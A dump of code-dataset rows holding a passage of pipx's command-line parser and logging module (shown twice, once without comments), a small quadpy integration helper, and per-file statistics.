description="Uninstall all pipx-managed packages",
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"reinstall",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall a package",
description=textwrap.dedent(
"""
Reinstalls a package.
Package is uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
"""
),
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"reinstall-all",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall all packages",
description=textwrap.dedent(
"""
Reinstalls all packages.
Packages are uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
This is useful if you upgraded to a new version of Python and want
all your packages to use the latest as well.
"""
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument("--verbose", action="store_true")
def _add_list(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"list",
help="List installed packages",
description="List packages and apps installed with pipx",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Show packages injected into the main app's environment",
)
p.add_argument(
"--json", action="store_true", help="Output rich data in json format."
)
p.add_argument("--verbose", action="store_true")
def _add_run(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"run",
formatter_class=LineWrapRawTextHelpFormatter,
help=(
"Download the latest version of a package to a temporary virtual environment, "
"then run an app from it. Also compatible with local `__pypackages__` "
"directory (experimental)."
),
description=textwrap.dedent(
f"""
Download the latest version of a package to a temporary virtual environment,
then run an app from it. The environment will be cached
and re-used for up to {constants.TEMP_VENV_EXPIRATION_THRESHOLD_DAYS} days. This
means subsequent calls to 'run' for the same package will be faster
since they can re-use the cached Virtual Environment.
In support of PEP 582 'run' will use apps found in a local __pypackages__
directory, if present. Please note that this behavior is experimental,
and acts as a companion tool to pythonloc. It may be modified or
removed in the future. See https://github.com/cs01/pythonloc.
"""
),
)
p.add_argument(
"--no-cache",
action="store_true",
help="Do not re-use cached virtual environment if it exists",
)
p.add_argument(
"app_with_args",
metavar="app ...",
nargs=argparse.REMAINDER,
help="app/package name and any arguments to be passed to it",
default=[],
)
p.add_argument(
"--pypackages",
action="store_true",
help="Require app to be run from local __pypackages__ directory",
)
p.add_argument("--spec", help=SPEC_HELP)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help="The Python version to run package's CLI app with. Must be v3.6+.",
)
add_pip_venv_args(p)
p.set_defaults(subparser=p)
# modify usage text to show required app argument
p.usage = re.sub(r"^usage: ", "", p.format_usage())
# add a double-dash to usage text to show requirement before app
p.usage = re.sub(r"\.\.\.", "app ...", p.usage)
def _add_runpip(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"runpip",
help="Run pip in an existing pipx-managed Virtual Environment",
description="Run pip in an existing pipx-managed Virtual Environment",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to run pip in",
).completer = venv_completer
p.add_argument(
"pipargs",
nargs=argparse.REMAINDER,
default=[],
help="Arguments to forward to pip command",
)
p.add_argument("--verbose", action="store_true")
def _add_ensurepath(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"ensurepath",
help=(
"Ensure directories necessary for pipx operation are in your "
"PATH environment variable."
),
description=(
"Ensure directory where pipx stores apps is in your "
"PATH environment variable. Also if pipx was installed via "
"`pip install --user`, ensure pipx itself is in your PATH. "
"Note that running this may modify "
"your shell's configuration file(s) such as '~/.bashrc'."
),
)
p.add_argument(
"--force",
"-f",
action="store_true",
help=(
"Add text to your shell's config file even if it looks like your "
"PATH already contains paths to pipx and pipx-install apps."
),
)
def get_command_parser() -> argparse.ArgumentParser:
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
completer_venvs = InstalledVenvsCompleter(venv_container)
parser = argparse.ArgumentParser(
prog="pipx",
formatter_class=LineWrapRawTextHelpFormatter,
description=PIPX_DESCRIPTION,
)
parser.man_short_description = PIPX_DESCRIPTION.splitlines()[1] # type: ignore
subparsers = parser.add_subparsers(
dest="command", description="Get help for commands with pipx COMMAND --help"
)
_add_install(subparsers)
_add_inject(subparsers, completer_venvs.use)
_add_upgrade(subparsers, completer_venvs.use)
_add_upgrade_all(subparsers)
_add_uninstall(subparsers, completer_venvs.use)
_add_uninstall_all(subparsers)
_add_reinstall(subparsers, completer_venvs.use)
_add_reinstall_all(subparsers)
_add_list(subparsers)
_add_run(subparsers)
_add_runpip(subparsers, completer_venvs.use)
_add_ensurepath(subparsers)
parser.add_argument("--version", action="store_true", help="Print version and exit")
subparsers.add_parser(
"completions",
help="Print instructions on enabling shell completions for pipx",
description="Print instructions on enabling shell completions for pipx",
)
return parser
def delete_oldest_logs(file_list: List[Path], keep_number: int) -> None:
file_list = sorted(file_list)
if len(file_list) > keep_number:
for existing_file in file_list[:-keep_number]:
try:
existing_file.unlink()
except FileNotFoundError:
pass
def setup_log_file() -> Path:
max_logs = 10
# don't use utils.mkdir, to prevent emission of log message
constants.PIPX_LOG_DIR.mkdir(parents=True, exist_ok=True)
delete_oldest_logs(list(constants.PIPX_LOG_DIR.glob("cmd_*[0-9].log")), max_logs)
delete_oldest_logs(
list(constants.PIPX_LOG_DIR.glob("cmd_*_pip_errors.log")), max_logs
)
datetime_str = time.strftime("%Y-%m-%d_%H.%M.%S")
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}.log"
counter = 1
while log_file.exists() and counter < 10:
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}_{counter}.log"
counter += 1
return log_file
def setup_logging(verbose: bool) -> None:
pipx_str = bold(green("pipx >")) if sys.stdout.isatty() else "pipx >"
pipx.constants.pipx_log_file = setup_log_file()
# "incremental" is False so previous pytest tests don't accumulate handlers
logging_config = {
"version": 1,
"formatters": {
"stream_nonverbose": {
"class": "logging.Formatter",
"format": "{message}",
"style": "{",
},
"stream_verbose": {
"class": "logging.Formatter",
"format": pipx_str + "({funcName}:{lineno}): {message}",
"style": "{",
},
"file": {
"class": "logging.Formatter",
"format": "{relativeCreated: >8.1f}ms ({funcName}:{lineno}): {message}",
"style": "{",
},
},
"handlers": {
"stream": {
"class": "logging.StreamHandler",
"formatter": "stream_verbose" if verbose else "stream_nonverbose",
"level": "INFO" if verbose else "WARNING",
},
"file": {
"class": "logging.FileHandler",
"formatter": "file",
"filename": str(pipx.constants.pipx_log_file),
"encoding": "utf-8",
"level": "DEBUG",
},
},
"loggers": {"pipx": {"handlers": ["stream", "file"], "level": "DEBUG"}},
"incremental": False,
}
logging.config.dictConfig(logging_config)
def setup(args: argparse.Namespace) -> None:
if "version" in args and args.version:
print_version()
sys.exit(0)
setup_logging("verbose" in args and args.verbose)
logger.debug(f"{time.strftime('%Y-%m-%d %H:%M:%S')}")
logger.debug(f"{' '.join(sys.argv)}")
logger.info(f"pipx version is {__version__}")
logger.info(f"Default python interpreter is {repr(DEFAULT_PYTHON)}")
mkdir(constants.PIPX_LOCAL_VENVS)
mkdir(constants.LOCAL_BIN_DIR)
mkdir(constants.PIPX_VENV_CACHEDIR)
rmdir(constants.PIPX_TRASH_DIR, False)
old_pipx_venv_location = constants.PIPX_LOCAL_VENVS / "pipx-app"
if old_pipx_venv_location.exists():
logger.warning(
pipx_wrap(
f"""
{hazard} A virtual environment for pipx was detected at
{str(old_pipx_venv_location)}. The 'pipx-app' package has been
renamed back to 'pipx'
(https://github.com/pypa/pipx/issues/82).
""",
subsequent_indent=" " * 4,
)
)
def check_args(parsed_pipx_args: argparse.Namespace) -> None:
if parsed_pipx_args.command == "run":
# we manually discard a first -- because using nargs=argparse.REMAINDER
# will not do it automatically
if parsed_pipx_args.app_with_args and parsed_pipx_args.app_with_args[0] == "--":
parsed_pipx_args.app_with_args.pop(0)
# since we would like app to be required but not in a separate argparse
# add_argument, we implement our own missing required arg error
if not parsed_pipx_args.app_with_args:
parsed_pipx_args.subparser.error(
"the following arguments are required: app"
)
def cli() -> ExitCode:
"""Entry point from command line"""
try:
hide_cursor()
parser = get_command_parser()
argcomplete.autocomplete(parser)
parsed_pipx_args = parser.parse_args()
setup(parsed_pipx_args)
check_args(parsed_pipx_args)
if not parsed_pipx_args.command:
parser.print_help()
return ExitCode(1)
return run_pipx_command(parsed_pipx_args)
except PipxError as e:
print(str(e), file=sys.stderr)
logger.debug(f"PipxError: {e}", exc_info=True)
return ExitCode(1)
except KeyboardInterrupt:
return ExitCode(1)
except Exception:
logger.debug("Uncaught Exception:", exc_info=True)
raise
finally:
logger.debug("pipx finished.")
show_cursor()
if __name__ == "__main__":
sys.exit(cli())
| 34.321608
| 121
| 0.636054
|
import argparse
import logging
import logging.config
import os
import re
import shlex
import sys
import textwrap
import time
import urllib.parse
from pathlib import Path
from typing import Any, Callable, Dict, List
import argcomplete
from packaging.requirements import InvalidRequirement, Requirement
from packaging.utils import canonicalize_name
import pipx.constants
from pipx import commands, constants
from pipx.animate import hide_cursor, show_cursor
from pipx.colors import bold, green
from pipx.constants import ExitCode
from pipx.emojis import hazard
from pipx.interpreter import DEFAULT_PYTHON
from pipx.util import PipxError, mkdir, pipx_wrap, rmdir
from pipx.venv import VenvContainer
from pipx.version import __version__
logger = logging.getLogger(__name__)
VenvCompleter = Callable[[str], List[str]]
def print_version() -> None:
print(__version__)
SPEC_HELP = textwrap.dedent(
"""\
The package name or specific installation source passed to pip.
Runs `pip install -U SPEC`.
For example `--spec mypackage==2.0.0` or `--spec git+https://github.com/user/repo.git@branch`
"""
)
PIPX_DESCRIPTION = textwrap.dedent(
f"""
Install and execute apps from Python packages.
Binaries can either be installed globally into isolated Virtual Environments
or run directly in a temporary Virtual Environment.
Virtual Environment location is {str(constants.PIPX_LOCAL_VENVS)}.
Symlinks to apps are placed in {str(constants.LOCAL_BIN_DIR)}.
"""
)
PIPX_DESCRIPTION += pipx_wrap(
"""
optional environment variables:
PIPX_HOME Overrides default pipx location. Virtual Environments will be installed to $PIPX_HOME/venvs.
PIPX_BIN_DIR Overrides location of app installations. Apps are symlinked or copied here.
USE_EMOJI Overrides emoji behavior. Default value varies based on platform.
PIPX_DEFAULT_PYTHON Overrides default python used for commands.
""",
subsequent_indent=" " * 24,
keep_newlines=True,
)
DOC_DEFAULT_PYTHON = os.getenv("PIPX__DOC_DEFAULT_PYTHON", DEFAULT_PYTHON)
INSTALL_DESCRIPTION = textwrap.dedent(
f"""
The install command is the preferred way to globally install apps
from python packages on your system. It creates an isolated virtual
environment for the package, then ensures the package's apps are
accessible on your $PATH.
The result: apps you can run from anywhere, located in packages
you can cleanly upgrade or uninstall. Guaranteed to not have
dependency version conflicts or interfere with your OS's python
packages. 'sudo' is not required to do this.
pipx install PACKAGE_NAME
pipx install --python PYTHON PACKAGE_NAME
pipx install VCS_URL
pipx install ./LOCAL_PATH
pipx install ZIP_FILE
pipx install TAR_GZ_FILE
The PACKAGE_SPEC argument is passed directly to `pip install`.
The default virtual environment location is {constants.DEFAULT_PIPX_HOME}
and can be overridden by setting the environment variable `PIPX_HOME`
(Virtual Environments will be installed to `$PIPX_HOME/venvs`).
The default app location is {constants.DEFAULT_PIPX_BIN_DIR} and can be
overridden by setting the environment variable `PIPX_BIN_DIR`.
The default python executable used to install a package is
{DOC_DEFAULT_PYTHON} and can be overridden
by setting the environment variable `PIPX_DEFAULT_PYTHON`.
"""
)
class LineWrapRawTextHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _split_lines(self, text: str, width: int) -> List[str]:
text = self._whitespace_matcher.sub(" ", text).strip()
return textwrap.wrap(text, width)
class InstalledVenvsCompleter:
def __init__(self, venv_container: VenvContainer) -> None:
self.packages = [str(p.name) for p in sorted(venv_container.iter_venv_dirs())]
def use(self, prefix: str, **kwargs: Any) -> List[str]:
return [
f"{prefix}{x[len(prefix):]}"
for x in self.packages
if x.startswith(canonicalize_name(prefix))
]
def get_pip_args(parsed_args: Dict[str, str]) -> List[str]:
pip_args: List[str] = []
if parsed_args.get("index_url"):
pip_args += ["--index-url", parsed_args["index_url"]]
if parsed_args.get("pip_args"):
pip_args += shlex.split(parsed_args.get("pip_args", ""))
if parsed_args.get("editable"):
pip_args += ["--editable"]
return pip_args
def get_venv_args(parsed_args: Dict[str, str]) -> List[str]:
venv_args: List[str] = []
if parsed_args.get("system_site_packages"):
venv_args += ["--system-site-packages"]
return venv_args
def run_pipx_command(args: argparse.Namespace) -> ExitCode:
verbose = args.verbose if "verbose" in args else False
pip_args = get_pip_args(vars(args))
venv_args = get_venv_args(vars(args))
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
if "package" in args:
package = args.package
if urllib.parse.urlparse(package).scheme:
raise PipxError("Package cannot be a url")
if "spec" in args and args.spec is not None:
if urllib.parse.urlparse(args.spec).scheme:
if "#egg=" not in args.spec:
args.spec = args.spec + f"#egg={package}"
venv_dir = venv_container.get_venv_dir(package)
logger.info(f"Virtual Environment location is {venv_dir}")
if "skip" in args:
skip_list = [canonicalize_name(x) for x in args.skip]
if args.command == "run":
package_or_url = (
args.spec
if ("spec" in args and args.spec is not None)
else args.app_with_args[0]
)
try:
package_name = Requirement(args.app_with_args[0]).name
except InvalidRequirement:
package_name = args.app_with_args[0]
use_cache = not args.no_cache
commands.run(
package_name,
package_or_url,
args.app_with_args[1:],
args.python,
pip_args,
venv_args,
args.pypackages,
verbose,
use_cache,
)
# We should never reach here because run() is NoReturn.
return ExitCode(1)
elif args.command == "install":
return commands.install(
None,
None,
args.package_spec,
constants.LOCAL_BIN_DIR,
args.python,
pip_args,
venv_args,
verbose,
force=args.force,
include_dependencies=args.include_deps,
suffix=args.suffix,
)
elif args.command == "inject":
return commands.inject(
venv_dir,
None,
args.dependencies,
pip_args,
verbose=verbose,
include_apps=args.include_apps,
include_dependencies=args.include_deps,
force=args.force,
)
elif args.command == "upgrade":
return commands.upgrade(
venv_dir,
pip_args,
verbose,
include_injected=args.include_injected,
force=args.force,
)
elif args.command == "upgrade-all":
return commands.upgrade_all(
venv_container,
verbose,
include_injected=args.include_injected,
skip=skip_list,
force=args.force,
)
elif args.command == "list":
return commands.list_packages(venv_container, args.include_injected, args.json)
elif args.command == "uninstall":
return commands.uninstall(venv_dir, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "uninstall-all":
return commands.uninstall_all(venv_container, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "reinstall":
return commands.reinstall(
venv_dir=venv_dir,
local_bin_dir=constants.LOCAL_BIN_DIR,
python=args.python,
verbose=verbose,
)
elif args.command == "reinstall-all":
return commands.reinstall_all(
venv_container,
constants.LOCAL_BIN_DIR,
args.python,
verbose,
skip=skip_list,
)
elif args.command == "runpip":
if not venv_dir:
raise PipxError("Developer error: venv_dir is not defined.")
return commands.run_pip(package, venv_dir, args.pipargs, args.verbose)
elif args.command == "ensurepath":
try:
return commands.ensure_pipx_paths(force=args.force)
except Exception as e:
logger.debug("Uncaught Exception:", exc_info=True)
raise PipxError(str(e), wrap_message=False)
elif args.command == "completions":
print(constants.completion_instructions)
return ExitCode(0)
else:
raise PipxError(f"Unknown command {args.command}")
def add_pip_venv_args(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--system-site-packages",
action="store_true",
help="Give the virtual environment access to the system site-packages dir.",
)
parser.add_argument("--index-url", "-i", help="Base URL of Python Package Index")
parser.add_argument(
"--editable",
"-e",
help="Install a project in editable mode",
action="store_true",
)
parser.add_argument(
"--pip-args",
help="Arbitrary pip arguments to pass directly to pip install/upgrade commands",
)
def add_include_dependencies(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--include-deps", help="Include apps of dependent packages", action="store_true"
)
def _add_install(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"install",
help="Install a package",
formatter_class=LineWrapRawTextHelpFormatter,
description=INSTALL_DESCRIPTION,
)
p.add_argument("package_spec", help="package name or pip installation spec")
add_include_dependencies(p)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument(
"--suffix",
default="",
help=(
"Optional suffix for virtual environment and executable names. "
"NOTE: The suffix feature is experimental and subject to change."
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to create the Virtual Environment and run the "
"associated app/apps. Must be v3.6+."
),
)
add_pip_venv_args(p)
def _add_inject(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"inject",
help="Install packages into an existing Virtual Environment",
description="Installs packages to an existing pipx-managed virtual environment.",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to inject into",
).completer = venv_completer
p.add_argument(
"dependencies",
nargs="+",
help="the packages to inject into the Virtual Environment--either package name or pip package spec",
)
p.add_argument(
"--include-apps",
action="store_true",
help="Add apps from the injected packages onto your PATH",
)
add_include_dependencies(p)
add_pip_venv_args(p)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_upgrade(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"upgrade",
help="Upgrade a package",
description="Upgrade a package in a pipx-managed Virtual Environment by running 'pip install --upgrade PACKAGE'",
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
add_pip_venv_args(p)
p.add_argument("--verbose", action="store_true")
def _add_upgrade_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"upgrade-all",
help="Upgrade all packages. Runs `pip install -U <pkgname>` for each package.",
description="Upgrades all packages within their virtual environments by running 'pip install --upgrade PACKAGE'",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_uninstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"uninstall",
help="Uninstall a package",
description="Uninstalls a pipx-managed Virtual Environment by deleting it and any files that point to its apps.",
)
p.add_argument("package").completer = venv_completer
p.add_argument("--verbose", action="store_true")
def _add_uninstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"uninstall-all",
help="Uninstall all packages",
description="Uninstall all pipx-managed packages",
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"reinstall",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall a package",
description=textwrap.dedent(
"""
Reinstalls a package.
Package is uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
"""
),
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"reinstall-all",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall all packages",
description=textwrap.dedent(
"""
Reinstalls all packages.
Packages are uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
This is useful if you upgraded to a new version of Python and want
all your packages to use the latest as well.
"""
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument("--verbose", action="store_true")
def _add_list(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"list",
help="List installed packages",
description="List packages and apps installed with pipx",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Show packages injected into the main app's environment",
)
p.add_argument(
"--json", action="store_true", help="Output rich data in json format."
)
p.add_argument("--verbose", action="store_true")
def _add_run(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"run",
formatter_class=LineWrapRawTextHelpFormatter,
help=(
"Download the latest version of a package to a temporary virtual environment, "
"then run an app from it. Also compatible with local `__pypackages__` "
"directory (experimental)."
),
description=textwrap.dedent(
f"""
Download the latest version of a package to a temporary virtual environment,
then run an app from it. The environment will be cached
and re-used for up to {constants.TEMP_VENV_EXPIRATION_THRESHOLD_DAYS} days. This
means subsequent calls to 'run' for the same package will be faster
since they can re-use the cached Virtual Environment.
In support of PEP 582 'run' will use apps found in a local __pypackages__
directory, if present. Please note that this behavior is experimental,
and acts as a companion tool to pythonloc. It may be modified or
removed in the future. See https://github.com/cs01/pythonloc.
"""
),
)
p.add_argument(
"--no-cache",
action="store_true",
help="Do not re-use cached virtual environment if it exists",
)
p.add_argument(
"app_with_args",
metavar="app ...",
nargs=argparse.REMAINDER,
help="app/package name and any arguments to be passed to it",
default=[],
)
p.add_argument(
"--pypackages",
action="store_true",
help="Require app to be run from local __pypackages__ directory",
)
p.add_argument("--spec", help=SPEC_HELP)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help="The Python version to run package's CLI app with. Must be v3.6+.",
)
add_pip_venv_args(p)
p.set_defaults(subparser=p)
# modify usage text to show required app argument
p.usage = re.sub(r"^usage: ", "", p.format_usage())
# add a double-dash to usage text to show requirement before app
p.usage = re.sub(r"\.\.\.", "app ...", p.usage)
def _add_runpip(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"runpip",
help="Run pip in an existing pipx-managed Virtual Environment",
description="Run pip in an existing pipx-managed Virtual Environment",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to run pip in",
).completer = venv_completer
p.add_argument(
"pipargs",
nargs=argparse.REMAINDER,
default=[],
help="Arguments to forward to pip command",
)
p.add_argument("--verbose", action="store_true")
def _add_ensurepath(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"ensurepath",
help=(
"Ensure directories necessary for pipx operation are in your "
"PATH environment variable."
),
description=(
"Ensure directory where pipx stores apps is in your "
"PATH environment variable. Also if pipx was installed via "
"`pip install --user`, ensure pipx itself is in your PATH. "
"Note that running this may modify "
"your shell's configuration file(s) such as '~/.bashrc'."
),
)
p.add_argument(
"--force",
"-f",
action="store_true",
help=(
"Add text to your shell's config file even if it looks like your "
"PATH already contains paths to pipx and pipx-install apps."
),
)
def get_command_parser() -> argparse.ArgumentParser:
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
completer_venvs = InstalledVenvsCompleter(venv_container)
parser = argparse.ArgumentParser(
prog="pipx",
formatter_class=LineWrapRawTextHelpFormatter,
description=PIPX_DESCRIPTION,
)
parser.man_short_description = PIPX_DESCRIPTION.splitlines()[1] # type: ignore
subparsers = parser.add_subparsers(
dest="command", description="Get help for commands with pipx COMMAND --help"
)
_add_install(subparsers)
_add_inject(subparsers, completer_venvs.use)
_add_upgrade(subparsers, completer_venvs.use)
_add_upgrade_all(subparsers)
_add_uninstall(subparsers, completer_venvs.use)
_add_uninstall_all(subparsers)
_add_reinstall(subparsers, completer_venvs.use)
_add_reinstall_all(subparsers)
_add_list(subparsers)
_add_run(subparsers)
_add_runpip(subparsers, completer_venvs.use)
_add_ensurepath(subparsers)
parser.add_argument("--version", action="store_true", help="Print version and exit")
subparsers.add_parser(
"completions",
help="Print instructions on enabling shell completions for pipx",
description="Print instructions on enabling shell completions for pipx",
)
return parser
def delete_oldest_logs(file_list: List[Path], keep_number: int) -> None:
file_list = sorted(file_list)
if len(file_list) > keep_number:
for existing_file in file_list[:-keep_number]:
try:
existing_file.unlink()
except FileNotFoundError:
pass
def setup_log_file() -> Path:
max_logs = 10
# don't use utils.mkdir, to prevent emission of log message
constants.PIPX_LOG_DIR.mkdir(parents=True, exist_ok=True)
delete_oldest_logs(list(constants.PIPX_LOG_DIR.glob("cmd_*[0-9].log")), max_logs)
delete_oldest_logs(
list(constants.PIPX_LOG_DIR.glob("cmd_*_pip_errors.log")), max_logs
)
datetime_str = time.strftime("%Y-%m-%d_%H.%M.%S")
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}.log"
counter = 1
while log_file.exists() and counter < 10:
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}_{counter}.log"
counter += 1
return log_file
def setup_logging(verbose: bool) -> None:
pipx_str = bold(green("pipx >")) if sys.stdout.isatty() else "pipx >"
pipx.constants.pipx_log_file = setup_log_file()
logging_config = {
"version": 1,
"formatters": {
"stream_nonverbose": {
"class": "logging.Formatter",
"format": "{message}",
"style": "{",
},
"stream_verbose": {
"class": "logging.Formatter",
"format": pipx_str + "({funcName}:{lineno}): {message}",
"style": "{",
},
"file": {
"class": "logging.Formatter",
"format": "{relativeCreated: >8.1f}ms ({funcName}:{lineno}): {message}",
"style": "{",
},
},
"handlers": {
"stream": {
"class": "logging.StreamHandler",
"formatter": "stream_verbose" if verbose else "stream_nonverbose",
"level": "INFO" if verbose else "WARNING",
},
"file": {
"class": "logging.FileHandler",
"formatter": "file",
"filename": str(pipx.constants.pipx_log_file),
"encoding": "utf-8",
"level": "DEBUG",
},
},
"loggers": {"pipx": {"handlers": ["stream", "file"], "level": "DEBUG"}},
"incremental": False,
}
logging.config.dictConfig(logging_config)
def setup(args: argparse.Namespace) -> None:
if "version" in args and args.version:
print_version()
sys.exit(0)
setup_logging("verbose" in args and args.verbose)
logger.debug(f"{time.strftime('%Y-%m-%d %H:%M:%S')}")
logger.debug(f"{' '.join(sys.argv)}")
logger.info(f"pipx version is {__version__}")
logger.info(f"Default python interpreter is {repr(DEFAULT_PYTHON)}")
mkdir(constants.PIPX_LOCAL_VENVS)
mkdir(constants.LOCAL_BIN_DIR)
mkdir(constants.PIPX_VENV_CACHEDIR)
rmdir(constants.PIPX_TRASH_DIR, False)
old_pipx_venv_location = constants.PIPX_LOCAL_VENVS / "pipx-app"
if old_pipx_venv_location.exists():
logger.warning(
pipx_wrap(
f"""
{hazard} A virtual environment for pipx was detected at
{str(old_pipx_venv_location)}. The 'pipx-app' package has been
renamed back to 'pipx'
(https://github.com/pypa/pipx/issues/82).
""",
subsequent_indent=" " * 4,
)
)
def check_args(parsed_pipx_args: argparse.Namespace) -> None:
if parsed_pipx_args.command == "run":
# we manually discard a first -- because using nargs=argparse.REMAINDER
# will not do it automatically
if parsed_pipx_args.app_with_args and parsed_pipx_args.app_with_args[0] == "--":
parsed_pipx_args.app_with_args.pop(0)
# since we would like app to be required but not in a separate argparse
# add_argument, we implement our own missing required arg error
if not parsed_pipx_args.app_with_args:
parsed_pipx_args.subparser.error(
"the following arguments are required: app"
)
def cli() -> ExitCode:
try:
hide_cursor()
parser = get_command_parser()
argcomplete.autocomplete(parser)
parsed_pipx_args = parser.parse_args()
setup(parsed_pipx_args)
check_args(parsed_pipx_args)
if not parsed_pipx_args.command:
parser.print_help()
return ExitCode(1)
return run_pipx_command(parsed_pipx_args)
except PipxError as e:
print(str(e), file=sys.stderr)
logger.debug(f"PipxError: {e}", exc_info=True)
return ExitCode(1)
except KeyboardInterrupt:
return ExitCode(1)
except Exception:
logger.debug("Uncaught Exception:", exc_info=True)
raise
finally:
logger.debug("pipx finished.")
show_cursor()
if __name__ == "__main__":
sys.exit(cli())
| true
| true
|
f70b47643839b003e1a33b6eff6fc4f5f1de1581
| 410
|
py
|
Python
|
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | 1
|
2019-01-02T19:04:42.000Z
|
2019-01-02T19:04:42.000Z
|
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | null | null | null |
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
import numpy
from .. import helpers
def integrate(f, rule, dot=numpy.dot):
flt = numpy.vectorize(float)
return dot(f(flt(rule.points).T), flt(rule.weights))
def show(scheme, backend="mpl"):
"""Displays scheme for E_3^r quadrature.
"""
helpers.backend_to_function[backend](
scheme.points, scheme.weights, volume=8 * numpy.pi, edges=[]
)
return
| 20.5
| 68
| 0.641463
|
import numpy
from .. import helpers
def integrate(f, rule, dot=numpy.dot):
flt = numpy.vectorize(float)
return dot(f(flt(rule.points).T), flt(rule.weights))
def show(scheme, backend="mpl"):
helpers.backend_to_function[backend](
scheme.points, scheme.weights, volume=8 * numpy.pi, edges=[]
)
return
| true
| true
|
f70b478d5085a5ad29d7c5f1433e9a5dcace1aa8
| 488
|
py
|
Python
|
bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | null | null | null |
bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | null | null | null |
